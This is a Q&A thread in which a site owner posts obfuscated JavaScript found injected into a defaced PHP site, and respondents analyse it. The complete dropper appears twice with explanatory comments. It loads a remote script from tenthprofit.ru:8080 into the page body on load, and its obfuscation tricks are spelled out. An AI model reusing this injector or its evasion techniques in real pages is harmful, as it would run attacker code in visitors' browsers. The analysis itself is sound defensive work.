
This script was added to a defaced page of a client's web site running PHP. I have no idea what this script does, and do not know whether it is really malicious. Can someone advise? Please find the code below.

// File-scope state for the dropper defined below. Only `h` matters: H() fills it with
// the payload function and `window.onload = h` later installs it. GU, X and mP are
// never read anywhere in this script -- filler to pad the sample.
var GU = '';
var h;
var X = new String();
var mP = "";
// Analyst note: this block is an obfuscated script dropper. Most statements -- the
// numeric counters, throwaway objects and arrays, the `this.*` writes and the empty
// try/catch blocks -- are dead filler that never influences the payload. Only L, y,
// x, v, l, W, P and the inner function h do real work; the rest is noise meant to
// defeat signature matching and casual reading. Note that the filler assigns to
// undeclared names (OH, QM, q, ...), which in non-strict code creates globals.
H = function () {
    var F = ["hu"];

    // Helper: `d` characters of `Lc` starting at offset `O` (String.prototype.substr).
    // Used to carve URL fragments out of longer decoy literals.
    function L(Lc, O, d) {
        return Lc.substr(O, d);
    }
    OH = 55345;
    OH -= 37;
    var x = document; // alias so "document" appears only once in the text
    QM = 6929;
    QM++;
    q = 25298;
    q -= 65;
    var t = ''; // replacement used by y(): matched characters are deleted
    var vs = {};
    var u = ["hR"];
    var Oi = RegExp; // alias so `new RegExp(...)` is never spelled out
    var A = {
        kh: "LQ"
    };
    // Evaluates to "/google.com/abc.go.com/terra.com.br.php": each L(...) call keeps four
    // characters of its decoy literal. The Google-looking path is only the tail of the
    // loader URL assembled inside h below; it is not a google.com resource.
    var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
    yz = {
        Ec: false
    };

    // Helper: returns `Lc` with every character listed in `O` removed -- it builds the
    // character-class regex "[<O>]" with the g flag and replaces matches with t (""). This
    // is how the strings "script", "createElement" and "src" are kept out of the source.
    function y(Lc, O) {
        hI = 24414;
        hI++;
        g = {};
        a = 28529;
        a--;
        var d = new String(L("[n0jJ", 0, 1)) + O + String("]"); // "[" + O + "]"
        var m = new Oi(d, String("g"));
        n = {
            kW: 40818
        };
        ly = {
            HN: false
        };
        return Lc.replace(m, t);
    };
    ZW = 9686;
    ZW -= 202;
    GE = 56525;
    GE -= 235;
    D = ["u_", "QP"];
    var E = null;
    var vd = {
        ka: "J"
    };
    var Jn = new Date();
    Xg = {
        V: 51919
    };
    var l = 751407 - 743327; // 8080: the port of the loader URL
    try {} catch (U) {};
    var W = new String("body"); // x[W] below is document.body
    var qi = "qi";
    this.Vf = 38797;
    this.Vf--;
    var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ'); // "script"
    var RlE = 58536;
    var Xx = false;
    this.jo = '';
    vi = 41593;
    vi--;
    // Payload. Stored in the file-scope `h` and installed as window.onload further down,
    // so the injection happens once the defaced page has finished loading.
    h = function () {
        try {
            var YU = new String();
            var DY = "";
            var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6'); // "createElement"
            CN = {
                _Y: 63379
            };
            s = x[dY](P); // document.createElement("script"); `s` is undeclared, so it leaks as a global
            var fH = "fH";
            pI = 33929;
            pI--;
            Uw = [];
            var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK'); // "src"
            var Wg = [];
            var Lc = l + v; // "8080/google.com/abc.go.com/terra.com.br.php"
            var yW = new String();
            var iO = new String();
            var Oe = String("defe" + "r"); // "defer"
            var Et = ["qO", "AF"];
            var QX = 13548;
            // s.src = "http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"
            // (the host is spread over four fragments so it never appears whole in the source)
            s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
            PA = {};
            s[Oe] = [2, 1][1]; // s.defer = 1
            this.Vt = "Vt";
            var ho = 46131;
            try {
                var kn = 'cI'
            } catch (kn) {};
            this.ww = 27193;
            this.ww += 97;
            x[W].appendChild(s); // document.body.appendChild(s): the browser fetches and runs the remote script
            this.yk = 60072;
            this.yk++;
            var Lp = new Date();
        } catch (PY) {
            // Any failure (e.g. document.body not present) is swallowed; the filler
            // writes below are meaningless and leave no visible error.
            this.ku = 43483;
            this.ku++;
            this.ra = 47033;
            this.ra--;
            this.ru = "ru";
        };
        var lu = new Array();
        var me = new String();
    };
};
YB = ["LB", "uM"]; // undeclared name: implicit global, filler
var AI = {
    Vm: 4707
};
H(); // builds the payload and stores it in `h`; nothing touches the DOM yet
this.mDs = 57864; // `this` at the top level of a classic script is the global object
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
window.onload = h; // the one effective line here: runs the injector once the page has loaded
var PQ = false;
var mF = {
    Hm: false
};
try {
    var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";

If you didn't add it, well, then it certainly classifies as malicious.

The MYYN

If you want your question answered, I guess you need to format your code to look better, in a more human-readable form.

Something like this http://stackoverflow.com/questions/2903500/how-to-scroll-the-horizontal-scrollbar-in-an-iframe-from-the-parent-frame

Edit

Also, it looks like your "Malicious" script broke the SO site. It is certainly malicious.

dkris

Well, by definition it is malicious, as it was added as part of a defacement. It appears to redirect people to tenthprofit.ru, but I haven't run it so that's based on a cursory inspection of the (obfuscated) code.

Graham Lee

Yes, this is certainly malicious. It tries to look like a part of Google:

new String("/goo" + "gle." + L("com/DyBg", 0, 4)

But it actually does something (redirect / information gathering) on tenthprofit.ru:

new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

The best course is to save a copy of this code and delete it from the page.

Also, to make it more readable you can run it through: Jsbeautifier

RJD22
Here's another one that has some syntax highlighting as well: http://www.gosu.pl/decoder/
Don

This script adds a new <script> element to the body of the HTML file, which tries to load "tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php" as the src attribute of the tag. It's been taken down, so it should be harmless by now.

To the end of the BODY tag following line is added:

<script src="http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"></script>
Andris

Here is the "beautified script":

// File-scope state for the dropper defined below. Only `h` matters: H() fills it with
// the payload function and `window.onload = h` later installs it. GU, X and mP are
// never read anywhere in this script -- filler to pad the sample.
var GU = '';
var h;
var X = new String();
var mP = "";
// Analyst note: this block is an obfuscated script dropper. Most statements -- the
// numeric counters, throwaway objects and arrays, the `this.*` writes and the empty
// try/catch blocks -- are dead filler that never influences the payload. Only L, y,
// x, v, l, W, P and the inner function h do real work; the rest is noise meant to
// defeat signature matching and casual reading. Note that the filler assigns to
// undeclared names (OH, QM, q, ...), which in non-strict code creates globals.
H = function () {
    var F = ["hu"];

    // Helper: `d` characters of `Lc` starting at offset `O` (String.prototype.substr).
    // Used to carve URL fragments out of longer decoy literals.
    function L(Lc, O, d) {
        return Lc.substr(O, d);
    }
    OH = 55345;
    OH -= 37;
    var x = document; // alias so "document" appears only once in the text
    QM = 6929;
    QM++;
    q = 25298;
    q -= 65;
    var t = ''; // replacement used by y(): matched characters are deleted
    var vs = {};
    var u = ["hR"];
    var Oi = RegExp; // alias so `new RegExp(...)` is never spelled out
    var A = {
        kh: "LQ"
    };
    // Evaluates to "/google.com/abc.go.com/terra.com.br.php": each L(...) call keeps four
    // characters of its decoy literal. The Google-looking path is only the tail of the
    // loader URL assembled inside h below; it is not a google.com resource.
    var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
    yz = {
        Ec: false
    };

    // Helper: returns `Lc` with every character listed in `O` removed -- it builds the
    // character-class regex "[<O>]" with the g flag and replaces matches with t (""). This
    // is how the strings "script", "createElement" and "src" are kept out of the source.
    function y(Lc, O) {
        hI = 24414;
        hI++;
        g = {};
        a = 28529;
        a--;
        var d = new String(L("[n0jJ", 0, 1)) + O + String("]"); // "[" + O + "]"
        var m = new Oi(d, String("g"));
        n = {
            kW: 40818
        };
        ly = {
            HN: false
        };
        return Lc.replace(m, t);
    };
    ZW = 9686;
    ZW -= 202;
    GE = 56525;
    GE -= 235;
    D = ["u_", "QP"];
    var E = null;
    var vd = {
        ka: "J"
    };
    var Jn = new Date();
    Xg = {
        V: 51919
    };
    var l = 751407 - 743327; // 8080: the port of the loader URL
    try {} catch (U) {};
    var W = new String("body"); // x[W] below is document.body
    var qi = "qi";
    this.Vf = 38797;
    this.Vf--;
    var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ'); // "script"
    var RlE = 58536;
    var Xx = false;
    this.jo = '';
    vi = 41593;
    vi--;
    // Payload. Stored in the file-scope `h` and installed as window.onload further down,
    // so the injection happens once the defaced page has finished loading.
    h = function () {
        try {
            var YU = new String();
            var DY = "";
            var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6'); // "createElement"
            CN = {
                _Y: 63379
            };
            s = x[dY](P); // document.createElement("script"); `s` is undeclared, so it leaks as a global
            var fH = "fH";
            pI = 33929;
            pI--;
            Uw = [];
            var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK'); // "src"
            var Wg = [];
            var Lc = l + v; // "8080/google.com/abc.go.com/terra.com.br.php"
            var yW = new String();
            var iO = new String();
            var Oe = String("defe" + "r"); // "defer"
            var Et = ["qO", "AF"];
            var QX = 13548;
            // s.src = "http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"
            // (the host is spread over four fragments so it never appears whole in the source)
            s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
            PA = {};
            s[Oe] = [2, 1][1]; // s.defer = 1
            this.Vt = "Vt";
            var ho = 46131;
            try {
                var kn = 'cI'
            } catch (kn) {};
            this.ww = 27193;
            this.ww += 97;
            x[W].appendChild(s); // document.body.appendChild(s): the browser fetches and runs the remote script
            this.yk = 60072;
            this.yk++;
            var Lp = new Date();
        } catch (PY) {
            // Any failure (e.g. document.body not present) is swallowed; the filler
            // writes below are meaningless and leave no visible error.
            this.ku = 43483;
            this.ku++;
            this.ra = 47033;
            this.ra--;
            this.ru = "ru";
        };
        var lu = new Array();
        var me = new String();
    };
};
YB = ["LB", "uM"]; // undeclared name: implicit global, filler
var AI = {
    Vm: 4707
};
H(); // builds the payload and stores it in `h`; nothing touches the DOM yet
this.mDs = 57864; // `this` at the top level of a classic script is the global object
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
window.onload = h; // the one effective line here: runs the injector once the page has loaded
var PQ = false;
var mF = {
    Hm: false
};
try {
    var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";

I think that this line in particular is the telling one:

s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

It sets s[G] to a URL on tenthprofit.ru.

Propeng